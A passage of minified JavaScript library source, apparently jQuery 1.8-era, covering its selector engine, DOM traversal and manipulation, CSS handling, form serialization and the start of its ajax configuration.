t.getElementsByClassName!==p&&!n)return t.getElementsByClassName(e)}},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace($,""),e[3]=(e[4]||e[5]||"").replace($,""),e[2]==="~="&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),e[1]==="nth"?(e[2]||nt.error(e[0]),e[3]=+(e[3]?e[4]+(e[5]||1):2*(e[2]==="even"||e[2]==="odd")),e[4]=+(e[6]+e[7]||e[2]==="odd")):e[2]&&nt.error(e[0]),e},PSEUDO:function(e){var t,n;if(J.CHILD.test(e[0]))return null;if(e[3])e[2]=e[3];else if(t=e[4])q.test(t)&&(n=ut(t,!0))&&(n=t.indexOf(")",t.length-n)-t.length)&&(t=t.slice(0,n),e[0]=e[0].slice(0,n)),e[2]=t;return e.slice(0,3)}},filter:{ID:r?function(e){return e=e.replace($,""),function(t){return t.getAttribute("id")===e}}:function(e){return e=e.replace($,""),function(t){var n=typeof t.getAttributeNode!==p&&t.getAttributeNode("id");return n&&n.value===e}},TAG:function(e){return e==="*"?function(){return!0}:(e=e.replace($,"").toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=k[d][e+" "];return t||(t=new RegExp("(^|"+O+")"+e+"("+O+"|$)"))&&k(e,function(e){return t.test(e.className||typeof e.getAttribute!==p&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r,i){var s=nt.attr(r,e);return s==null?t==="!=":t?(s+="",t==="="?s===n:t==="!="?s!==n:t==="^="?n&&s.indexOf(n)===0:t==="*="?n&&s.indexOf(n)>-1:t==="$="?n&&s.substr(s.length-n.length)===n:t==="~="?(" "+s+" ").indexOf(n)>-1:t==="|="?s===n||s.substr(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r){return e==="nth"?function(e){var t,i,s=e.parentNode;if(n===1&&r===0)return!0;if(s){i=0;for(t=s.firstChild;t;t=t.nextSibling)if(t.nodeType===1){i++;if(e===t)break}}return i-=r,i===n||i%n===0&&i/n>=0}:function(t){var n=t;switch(e){case"only":case"first":while(n=n.previousSibling)if(n.nodeType===1)return!1;if(e==="first")return!0;n=t;case"last":while(n=n.nextSibling)if(n.nodeType===1)return!1;return!0}}},PSEUDO:function(e,t){var n,r=i.pseudos[e]||i.setFilters[e.toLowerCase()]||nt.error("unsupported pseudo: "+e);return r[d]?r(t):r.length>1?(n=[e,e,"",t],i.setFilters.hasOwnProperty(e.toLowerCase())?N(function(e,n){var i,s=r(e,t),o=s.length;while(o--)i=T.call(e,s[o]),e[i]=!(n[i]=s[o])}):function(e){return r(e,0,n)}):r}},pseudos:{not:N(function(e){var t=[],n=[],r=a(e.replace(j,"$1"));return r[d]?N(function(e,t,n,i){var s,o=r(e,null,i,[]),u=e.length;while(u--)if(s=o[u])e[u]=!(t[u]=s)}):function(e,i,s){return t[0]=e,r(t,null,s,n),!n.pop()}}),has:N(function(e){return function(t){return nt(e,t).length>0}}),contains:N(function(e){return function(t){return(t.textContent||t.innerText||s(t)).indexOf(e)>-1}}),enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&!!e.checked||t==="option"&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},parent:function(e){return!i.pseudos.empty(e)},empty:function(e){var t;e=e.firstChild;while(e){if(e.nodeName>"@"||(t=e.nodeType)===3||t===4)return!1;e=e.nextSibling}return!0},header:function(e){return X.test(e.nodeName)},text:function(e){var t,n;return e.nodeName.toLowerCase()==="input"&&(t=e.type)==="text"&&((n=e.getAttribute("type"))==null||n.toLowerCase()===t)},radio:rt("radio"),checkbox:rt("checkbox"),file:rt("file"),password:rt("password"),image:rt("image"),submit:it("submit"),reset:it("reset"),button:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&e.type==="button"||t==="button"},input:function(e){return V.test(e.nodeName)},focus:function(e){var t=e.ownerDocument;return e===t.activeElement&&(!t.hasFocus||t.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},active:function(e){return e===e.ownerDocument.activeElement},first:st(function(){return[0]}),last:st(function(e,t){return[t-1]}),eq:st(function(e,t,n){return[n<0?n+t:n]}),even:st(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:st(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:st(function(e,t,n){for(var r=n<0?n+t:n;--r>=0;)e.push(r);return e}),gt:st(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}},f=y.compareDocumentPosition?function(e,t){return e===t?(l=!0,0):(!e.compareDocumentPosition||!t.compareDocumentPosition?e.compareDocumentPosition:e.compareDocumentPosition(t)&4)?-1:1}:function(e,t){if(e===t)return l=!0,0;if(e.sourceIndex&&t.sourceIndex)return e.sourceIndex-t.sourceIndex;var n,r,i=[],s=[],o=e.parentNode,u=t.parentNode,a=o;if(o===u)return ot(e,t);if(!o)return-1;if(!u)return 1;while(a)i.unshift(a),a=a.parentNode;a=u;while(a)s.unshift(a),a=a.parentNode;n=i.length,r=s.length;for(var f=0;f<n&&f<r;f++)if(i[f]!==s[f])return ot(i[f],s[f]);return f===n?ot(e,s[f],-1):ot(i[f],t,1)},[0,0].sort(f),h=!l,nt.uniqueSort=function(e){var t,n=[],r=1,i=0;l=h,e.sort(f);if(l){for(;t=e[r];r++)t===e[r-1]&&(i=n.push(r));while(i--)e.splice(n[i],1)}return e},nt.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},a=nt.compile=function(e,t){var n,r=[],i=[],s=A[d][e+" "];if(!s){t||(t=ut(e)),n=t.length;while(n--)s=ht(t[n]),s[d]?r.push(s):i.push(s);s=A(e,pt(i,r))}return s},g.querySelectorAll&&function(){var e,t=vt,n=/'|\\/g,r=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,i=[":focus"],s=[":active"],u=y.matchesSelector||y.mozMatchesSelector||y.webkitMatchesSelector||y.oMatchesSelector||y.msMatchesSelector;K(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||i.push("\\["+O+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||i.push(":checked")}),K(function(e){e.innerHTML="<p test=''></p>",e.querySelectorAll("[test^='']").length&&i.push("[*^$]="+O+"*(?:\"\"|'')"),e.innerHTML="<input type='hidden'/>",e.querySelectorAll(":enabled").length||i.push(":enabled",":disabled")}),i=new RegExp(i.join("|")),vt=function(e,r,s,o,u){if(!o&&!u&&!i.test(e)){var a,f,l=!0,c=d,h=r,p=r.nodeType===9&&e;if(r.nodeType===1&&r.nodeName.toLowerCase()!=="object"){a=ut(e),(l=r.getAttribute("id"))?c=l.replace(n,"\\$&"):r.setAttribute("id",c),c="[id='"+c+"'] ",f=a.length;while(f--)a[f]=c+a[f].join("");h=z.test(e)&&r.parentNode||r,p=a.join(",")}if(p)try{return S.apply(s,x.call(h.querySelectorAll(p),0)),s}catch(v){}finally{l||r.removeAttribute("id")}}return t(e,r,s,o,u)},u&&(K(function(t){e=u.call(t,"div");try{u.call(t,"[test!='']:sizzle"),s.push("!=",H)}catch(n){}}),s=new RegExp(s.join("|")),nt.matchesSelector=function(t,n){n=n.replace(r,"='$1']");if(!o(t)&&!s.test(n)&&!i.test(n))try{var a=u.call(t,n);if(a||e||t.document&&t.document.nodeType!==11)return a}catch(f){}return nt(n,null,null,[t]).length>0})}(),i.pseudos.nth=i.pseudos.eq,i.filters=mt.prototype=i.pseudos,i.setFilters=new mt,nt.attr=v.attr,v.find=nt,v.expr=nt.selectors,v.expr[":"]=v.expr.pseudos,v.unique=nt.uniqueSort,v.text=nt.getText,v.isXMLDoc=nt.isXML,v.contains=nt.contains}(e);var nt=/Until$/,rt=/^(?:parents|prev(?:Until|All))/,it=/^.[^:#\[\.,]*$/,st=v.expr.match.needsContext,ot={children:!0,contents:!0,next:!0,prev:!0};v.fn.extend({find:function(e){var t,n,r,i,s,o,u=this;if(typeof e!="string")return v(e).filter(function(){for(t=0,n=u.length;t<n;t++)if(v.contains(u[t],this))return!0});o=this.pushStack("","find",e);for(t=0,n=this.length;t<n;t++){r=o.length,v.find(e,this[t],o);if(t>0)for(i=r;i<o.length;i++)for(s=0;s<r;s++)if(o[s]===o[i]){o.splice(i--,1);break}}return o},has:function(e){var t,n=v(e,this),r=n.length;return this.filter(function(){for(t=0;t<r;t++)if(v.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e,!1),"not",e)},filter:function(e){return this.pushStack(ft(this,e,!0),"filter",e)},is:function(e){return!!e&&(typeof e=="string"?st.test(e)?v(e,this.context).index(this[0])>=0:v.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){var n,r=0,i=this.length,s=[],o=st.test(e)||typeof e!="string"?v(e,t||this.context):0;for(;r<i;r++){n=this[r];while(n&&n.ownerDocument&&n!==t&&n.nodeType!==11){if(o?o.index(n)>-1:v.find.matchesSelector(n,e)){s.push(n);break}n=n.parentNode}}return s=s.length>1?v.unique(s):s,this.pushStack(s,"closest",e)},index:function(e){return e?typeof e=="string"?v.inArray(this[0],v(e)):v.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.prevAll().length:-1},add:function(e,t){var n=typeof e=="string"?v(e,t):v.makeArray(e&&e.nodeType?[e]:e),r=v.merge(this.get(),n);return this.pushStack(ut(n[0])||ut(r[0])?r:v.unique(r))},addBack:function(e){return this.add(e==null?this.prevObject:this.prevObject.filter(e))}}),v.fn.andSelf=v.fn.addBack,v.each({parent:function(e){var t=e.parentNode;return t&&t.nodeType!==11?t:null},parents:function(e){return v.dir(e,"parentNode")},parentsUntil:function(e,t,n){return v.dir(e,"parentNode",n)},next:function(e){return at(e,"nextSibling")},prev:function(e){return at(e,"previousSibling")},nextAll:function(e){return v.dir(e,"nextSibling")},prevAll:function(e){return v.dir(e,"previousSibling")},nextUntil:function(e,t,n){return v.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return v.dir(e,"previousSibling",n)},siblings:function(e){return v.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return v.sibling(e.firstChild)},contents:function(e){return v.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:v.merge([],e.childNodes)}},function(e,t){v.fn[e]=function(n,r){var i=v.map(this,t,n);return nt.test(e)||(r=n),r&&typeof r=="string"&&(i=v.filter(r,i)),i=this.length>1&&!ot[e]?v.unique(i):i,this.length>1&&rt.test(e)&&(i=i.reverse()),this.pushStack(i,e,l.call(arguments).join(","))}}),v.extend({filter:function(e,t,n){return n&&(e=":not("+e+")"),t.length===1?v.find.matchesSelector(t[0],e)?[t[0]]:[]:v.find.matches(e,t)},dir:function(e,n,r){var i=[],s=e[n];while(s&&s.nodeType!==9&&(r===t||s.nodeType!==1||!v(s).is(r)))s.nodeType===1&&i.push(s),s=s[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)e.nodeType===1&&e!==t&&n.push(e);return n}});var ct="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",ht=/ jQuery\d+="(?:null|\d+)"/g,pt=/^\s+/,dt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,vt=/<([\w:]+)/,mt=/<tbody/i,gt=/<|&#?\w+;/,yt=/<(?:script|style|link)/i,bt=/<(?:script|object|embed|option|style)/i,wt=new RegExp("<(?:"+ct+")[\\s/>]","i"),Et=/^(?:checkbox|radio)$/,St=/checked\s*(?:[^=]|=\s*.checked.)/i,xt=/\/(java|ecma)script/i,Tt=/^\s*<!(?:\[CDATA\[|\-\-)|[\]\-]{2}>\s*$/g,Nt={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]},Ct=lt(i),kt=Ct.appendChild(i.createElement("div"));Nt.optgroup=Nt.option,Nt.tbody=Nt.tfoot=Nt.colgroup=Nt.caption=Nt.thead,Nt.th=Nt.td,v.support.htmlSerialize||(Nt._default=[1,"X<div>","</div>"]),v.fn.extend({text:function(e){return v.access(this,function(e){return e===t?v.text(this):this.empty().append((this[0]&&this[0].ownerDocument||i).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(v.isFunction(e))return this.each(function(t){v(this).wrapAll(e.call(this,t))});if(this[0]){var t=v(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&e.firstChild.nodeType===1)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return v.isFunction(e)?this.each(function(t){v(this).wrapInner(e.call(this,t))}):this.each(function(){var t=v(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=v.isFunction(e);return this.each(function(n){v(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){v.nodeName(this,"body")||v(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11)&&this.insertBefore(e,this.firstChild)})},before:function(){if(!ut(this[0]))return this.domManip(arguments,!1,function(e){this.parentNode.insertBefore(e,this)});if(arguments.length){var e=v.clean(arguments);return this.pushStack(v.merge(e,this),"before",this.selector)}},after:function(){if(!ut(this[0]))return this.domManip(arguments,!1,function(e){this.parentNode.insertBefore(e,this.nextSibling)});if(arguments.length){var e=v.clean(arguments);return this.pushStack(v.merge(this,e),"after",this.selector)}},remove:function(e,t){var n,r=0;for(;(n=this[r])!=null;r++)if(!e||v.filter(e,[n]).length)!t&&n.nodeType===1&&(v.cleanData(n.getElementsByTagName("*")),v.cleanData([n])),n.parentNode&&n.parentNode.removeChild(n);return this},empty:function(){var e,t=0;for(;(e=this[t])!=null;t++){e.nodeType===1&&v.cleanData(e.getElementsByTagName("*"));while(e.firstChild)e.removeChild(e.firstChild)}return this},clone:function(e,t){return e=e==null?!1:e,t=t==null?e:t,this.map(function(){return v.clone(this,e,t)})},html:function(e){return v.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return n.nodeType===1?n.innerHTML.replace(ht,""):t;if(typeof e=="string"&&!yt.test(e)&&(v.support.htmlSerialize||!wt.test(e))&&(v.support.leadingWhitespace||!pt.test(e))&&!Nt[(vt.exec(e)||["",""])[1].toLowerCase()]){e=e.replace(dt,"<$1></$2>");try{for(;r<i;r++)n=this[r]||{},n.nodeType===1&&(v.cleanData(n.getElementsByTagName("*")),n.innerHTML=e);n=0}catch(s){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){return ut(this[0])?this.length?this.pushStack(v(v.isFunction(e)?e():e),"replaceWith",e):this:v.isFunction(e)?this.each(function(t){var n=v(this),r=n.html();n.replaceWith(e.call(this,t,r))}):(typeof e!="string"&&(e=v(e).detach()),this.each(function(){var t=this.nextSibling,n=this.parentNode;v(this).remove(),t?v(t).before(e):v(n).append(e)}))},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=[].concat.apply([],e);var i,s,o,u,a=0,f=e[0],l=[],c=this.length;if(!v.support.checkClone&&c>1&&typeof f=="string"&&St.test(f))return this.each(function(){v(this).domManip(e,n,r)});if(v.isFunction(f))return this.each(function(i){var s=v(this);e[0]=f.call(this,i,n?s.html():t),s.domManip(e,n,r)});if(this[0]){i=v.buildFragment(e,this,l),o=i.fragment,s=o.firstChild,o.childNodes.length===1&&(o=s);if(s){n=n&&v.nodeName(s,"tr");for(u=i.cacheable||c-1;a<c;a++)r.call(n&&v.nodeName(this[a],"table")?Lt(this[a],"tbody"):this[a],a===u?o:v.clone(o,!0,!0))}o=s=null,l.length&&v.each(l,function(e,t){t.src?v.ajax?v.ajax({url:t.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):v.error("no ajax"):v.globalEval((t.text||t.textContent||t.innerHTML||"").replace(Tt,"")),t.parentNode&&t.parentNode.removeChild(t)})}return this}}),v.buildFragment=function(e,n,r){var s,o,u,a=e[0];return n=n||i,n=!n.nodeType&&n[0]||n,n=n.ownerDocument||n,e.length===1&&typeof a=="string"&&a.length<512&&n===i&&a.charAt(0)==="<"&&!bt.test(a)&&(v.support.checkClone||!St.test(a))&&(v.support.html5Clone||!wt.test(a))&&(o=!0,s=v.fragments[a],u=s!==t),s||(s=n.createDocumentFragment(),v.clean(e,n,s,r),o&&(v.fragments[a]=u&&s)),{fragment:s,cacheable:o}},v.fragments={},v.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){v.fn[e]=function(n){var r,i=0,s=[],o=v(n),u=o.length,a=this.length===1&&this[0].parentNode;if((a==null||a&&a.nodeType===11&&a.childNodes.length===1)&&u===1)return o[t](this[0]),this;for(;i<u;i++)r=(i>0?this.clone(!0):this).get(),v(o[i])[t](r),s=s.concat(r);return this.pushStack(s,e,o.selector)}}),v.extend({clone:function(e,t,n){var r,i,s,o;v.support.html5Clone||v.isXMLDoc(e)||!wt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(kt.innerHTML=e.outerHTML,kt.removeChild(o=kt.firstChild));if((!v.support.noCloneEvent||!v.support.noCloneChecked)&&(e.nodeType===1||e.nodeType===11)&&!v.isXMLDoc(e)){Ot(e,o),r=Mt(e),i=Mt(o);for(s=0;r[s];++s)i[s]&&Ot(r[s],i[s])}if(t){At(e,o);if(n){r=Mt(e),i=Mt(o);for(s=0;r[s];++s)At(r[s],i[s])}}return r=i=null,o},clean:function(e,t,n,r){var s,o,u,a,f,l,c,h,p,d,m,g,y=t===i&&Ct,b=[];if(!t||typeof t.createDocumentFragment=="undefined")t=i;for(s=0;(u=e[s])!=null;s++){typeof u=="number"&&(u+="");if(!u)continue;if(typeof u=="string")if(!gt.test(u))u=t.createTextNode(u);else{y=y||lt(t),c=t.createElement("div"),y.appendChild(c),u=u.replace(dt,"<$1></$2>"),a=(vt.exec(u)||["",""])[1].toLowerCase(),f=Nt[a]||Nt._default,l=f[0],c.innerHTML=f[1]+u+f[2];while(l--)c=c.lastChild;if(!v.support.tbody){h=mt.test(u),p=a==="table"&&!h?c.firstChild&&c.firstChild.childNodes:f[1]==="<table>"&&!h?c.childNodes:[];for(o=p.length-1;o>=0;--o)v.nodeName(p[o],"tbody")&&!p[o].childNodes.length&&p[o].parentNode.removeChild(p[o])}!v.support.leadingWhitespace&&pt.test(u)&&c.insertBefore(t.createTextNode(pt.exec(u)[0]),c.firstChild),u=c.childNodes,c.parentNode.removeChild(c)}u.nodeType?b.push(u):v.merge(b,u)}c&&(u=c=y=null);if(!v.support.appendChecked)for(s=0;(u=b[s])!=null;s++)v.nodeName(u,"input")?_t(u):typeof u.getElementsByTagName!="undefined"&&v.grep(u.getElementsByTagName("input"),_t);if(n){m=function(e){if(!e.type||xt.test(e.type))return r?r.push(e.parentNode?e.parentNode.removeChild(e):e):n.appendChild(e)};for(s=0;(u=b[s])!=null;s++)if(!v.nodeName(u,"script")||!m(u))n.appendChild(u),typeof u.getElementsByTagName!="undefined"&&(g=v.grep(v.merge([],u.getElementsByTagName("script")),m),b.splice.apply(b,[s+1,0].concat(g)),s+=g.length)}return b},cleanData:function(e,t){var n,r,i,s,o=0,u=v.expando,a=v.cache,f=v.support.deleteExpando,l=v.event.special;for(;(i=e[o])!=null;o++)if(t||v.acceptData(i)){r=i[u],n=r&&a[r];if(n){if(n.events)for(s in n.events)l[s]?v.event.remove(i,s):v.removeEvent(i,s,n.handle);a[r]&&(delete a[r],f?delete i[u]:i.removeAttribute?i.removeAttribute(u):i[u]=null,v.deletedIds.push(r))}}}}),function(){var e,t;v.uaMatch=function(e){e=e.toLowerCase();var t=/(chrome)[ \/]([\w.]+)/.exec(e)||/(webkit)[ \/]([\w.]+)/.exec(e)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(e)||/(msie) ([\w.]+)/.exec(e)||e.indexOf("compatible")<0&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(e)||[];return{browser:t[1]||"",version:t[2]||"0"}},e=v.uaMatch(o.userAgent),t={},e.browser&&(t[e.browser]=!0,t.version=e.version),t.chrome?t.webkit=!0:t.webkit&&(t.safari=!0),v.browser=t,v.sub=function(){function e(t,n){return new e.fn.init(t,n)}v.extend(!0,e,this),e.superclass=this,e.fn=e.prototype=this(),e.fn.constructor=e,e.sub=this.sub,e.fn.init=function(r,i){return i&&i instanceof v&&!(i instanceof e)&&(i=e(i)),v.fn.init.call(this,r,i,t)},e.fn.init.prototype=e.fn;var t=e(i);return e}}();var Dt,Pt,Ht,Bt=/alpha\([^)]*\)/i,jt=/opacity=([^)]*)/,Ft=/^(top|right|bottom|left)$/,It=/^(none|table(?!-c[ea]).+)/,qt=/^margin/,Rt=new RegExp("^("+m+")(.*)$","i"),Ut=new RegExp("^("+m+")(?!px)[a-z%]+$","i"),zt=new RegExp("^([-+])=("+m+")","i"),Wt={BODY:"block"},Xt={position:"absolute",visibility:"hidden",display:"block"},Vt={letterSpacing:0,fontWeight:400},$t=["Top","Right","Bottom","Left"],Jt=["Webkit","O","Moz","ms"],Kt=v.fn.toggle;v.fn.extend({css:function(e,n){return v.access(this,function(e,n,r){return r!==t?v.style(e,n,r):v.css(e,n)},e,n,arguments.length>1)},show:function(){return Yt(this,!0)},hide:function(){return Yt(this)},toggle:function(e,t){var n=typeof e=="boolean";return v.isFunction(e)&&v.isFunction(t)?Kt.apply(this,arguments):this.each(function(){(n?e:Gt(this))?v(this).show():v(this).hide()})}}),v.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Dt(e,"opacity");return n===""?"1":n}}}},cssNumber:{fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":v.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(!e||e.nodeType===3||e.nodeType===8||!e.style)return;var s,o,u,a=v.camelCase(n),f=e.style;n=v.cssProps[a]||(v.cssProps[a]=Qt(f,a)),u=v.cssHooks[n]||v.cssHooks[a];if(r===t)return u&&"get"in u&&(s=u.get(e,!1,i))!==t?s:f[n];o=typeof r,o==="string"&&(s=zt.exec(r))&&(r=(s[1]+1)*s[2]+parseFloat(v.css(e,n)),o="number");if(r==null||o==="number"&&isNaN(r))return;o==="number"&&!v.cssNumber[a]&&(r+="px");if(!u||!("set"in u)||(r=u.set(e,r,i))!==t)try{f[n]=r}catch(l){}},css:function(e,n,r,i){var s,o,u,a=v.camelCase(n);return n=v.cssProps[a]||(v.cssProps[a]=Qt(e.style,a)),u=v.cssHooks[n]||v.cssHooks[a],u&&"get"in u&&(s=u.get(e,!0,i)),s===t&&(s=Dt(e,n)),s==="normal"&&n in Vt&&(s=Vt[n]),r||i!==t?(o=parseFloat(s),r||v.isNumeric(o)?o||0:s):s},swap:function(e,t,n){var r,i,s={};for(i in t)s[i]=e.style[i],e.style[i]=t[i];r=n.call(e);for(i in t)e.style[i]=s[i];return r}}),e.getComputedStyle?Dt=function(t,n){var r,i,s,o,u=e.getComputedStyle(t,null),a=t.style;return u&&(r=u.getPropertyValue(n)||u[n],r===""&&!v.contains(t.ownerDocument,t)&&(r=v.style(t,n)),Ut.test(r)&&qt.test(n)&&(i=a.width,s=a.minWidth,o=a.maxWidth,a.minWidth=a.maxWidth=a.width=r,r=u.width,a.width=i,a.minWidth=s,a.maxWidth=o)),r}:i.documentElement.currentStyle&&(Dt=function(e,t){var n,r,i=e.currentStyle&&e.currentStyle[t],s=e.style;return i==null&&s&&s[t]&&(i=s[t]),Ut.test(i)&&!Ft.test(t)&&(n=s.left,r=e.runtimeStyle&&e.runtimeStyle.left,r&&(e.runtimeStyle.left=e.currentStyle.left),s.left=t==="fontSize"?"1em":i,i=s.pixelLeft+"px",s.left=n,r&&(e.runtimeStyle.left=r)),i===""?"auto":i}),v.each(["height","width"],function(e,t){v.cssHooks[t]={get:function(e,n,r){if(n)return e.offsetWidth===0&&It.test(Dt(e,"display"))?v.swap(e,Xt,function(){return tn(e,t,r)}):tn(e,t,r)},set:function(e,n,r){return Zt(e,n,r?en(e,t,r,v.support.boxSizing&&v.css(e,"boxSizing")==="border-box"):0)}}}),v.support.opacity||(v.cssHooks.opacity={get:function(e,t){return jt.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=v.isNumeric(t)?"alpha(opacity="+t*100+")":"",s=r&&r.filter||n.filter||"";n.zoom=1;if(t>=1&&v.trim(s.replace(Bt,""))===""&&n.removeAttribute){n.removeAttribute("filter");if(r&&!r.filter)return}n.filter=Bt.test(s)?s.replace(Bt,i):s+" "+i}}),v(function(){v.support.reliableMarginRight||(v.cssHooks.marginRight={get:function(e,t){return v.swap(e,{display:"inline-block"},function(){if(t)return Dt(e,"marginRight")})}}),!v.support.pixelPosition&&v.fn.position&&v.each(["top","left"],function(e,t){v.cssHooks[t]={get:function(e,n){if(n){var r=Dt(e,t);return Ut.test(r)?v(e).position()[t]+"px":r}}}})}),v.expr&&v.expr.filters&&(v.expr.filters.hidden=function(e){return e.offsetWidth===0&&e.offsetHeight===0||!v.support.reliableHiddenOffsets&&(e.style&&e.style.display||Dt(e,"display"))==="none"},v.expr.filters.visible=function(e){return!v.expr.filters.hidden(e)}),v.each({margin:"",padding:"",border:"Width"},function(e,t){v.cssHooks[e+t]={expand:function(n){var r,i=typeof n=="string"?n.split(" "):[n],s={};for(r=0;r<4;r++)s[e+$t[r]+t]=i[r]||i[r-2]||i[0];return s}},qt.test(e)||(v.cssHooks[e+t].set=Zt)});var rn=/%20/g,sn=/\[\]$/,on=/\r?\n/g,un=/^(?:color|date|datetime|datetime-local|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,an=/^(?:select|textarea)/i;v.fn.extend({serialize:function(){return v.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?v.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||an.test(this.nodeName)||un.test(this.type))}).map(function(e,t){var n=v(this).val();return n==null?null:v.isArray(n)?v.map(n,function(e,n){return{name:t.name,value:e.replace(on,"\r\n")}}):{name:t.name,value:n.replace(on,"\r\n")}}).get()}}),v.param=function(e,n){var r,i=[],s=function(e,t){t=v.isFunction(t)?t():t==null?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};n===t&&(n=v.ajaxSettings&&v.ajaxSettings.traditional);if(v.isArray(e)||e.jquery&&!v.isPlainObject(e))v.each(e,function(){s(this.name,this.value)});else for(r in e)fn(r,e[r],n,s);return i.join("&").replace(rn,"+")};var ln,cn,hn=/#.*$/,pn=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,dn=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/,vn=/^(?:GET|HEAD)$/,mn=/^\/\//,gn=/\?/,yn=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bn=/([?&])_=[^&]*/,wn=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,En=v.fn.load,Sn={},xn={},Tn=["*/"]+["*"];try{cn=s.href}catch(Nn){cn=i.createElement("a"),cn.href="",cn=cn.href}ln=wn.exec(cn.toLowerCase())||[],v.fn.load=function(e,n,r){if(typeof e!="string"&&En)return En.apply(this,arguments);if(!this.length)return this;var i,s,o,u=this,a=e.indexOf(" ");return a>=0&&(i=e.slice(a,e.length),e=e.slice(0,a)),v.isFunction(n)?(r=n,n=t):n&&typeof n=="object"&&(s="POST"),v.ajax({url:e,type:s,dataType:"html",data:n,complete:function(e,t){r&&u.each(r,o||[e.responseText,t,e])}}).done(function(e){o=arguments,u.html(i?v("<div>").append(e.replace(yn,"")).find(i):e)}),this},v.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(e,t){v.fn[t]=function(e){return this.on(t,e)}}),v.each(["get","post"],function(e,n){v[n]=function(e,r,i,s){return v.isFunction(r)&&(s=s||i,i=r,r=t),v.ajax({type:n,url:e,data:r,success:i,dataType:s})}}),v.extend({getScript:function(e,n){return v.get(e,t,n,"script")},getJSON:function(e,t,n){return v.get(e,t,n,"json")},ajaxSetup:function(e,t){return t?Ln(e,v.ajaxSettings):(t=e,e=v.ajaxSettings),Ln(e,t),e},ajaxSettings:{url:cn,isLocal:dn.test(ln[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded; charset=UTF-8",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":Tn},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":v.parseJSON,"text xml":v.parseXML},flatOptions:{context:!0,url:!0}},ajaxPrefilter:Cn(Sn),ajaxTransport:Cn(xn),ajax:function(e,n){function T(e,n,s,a){var 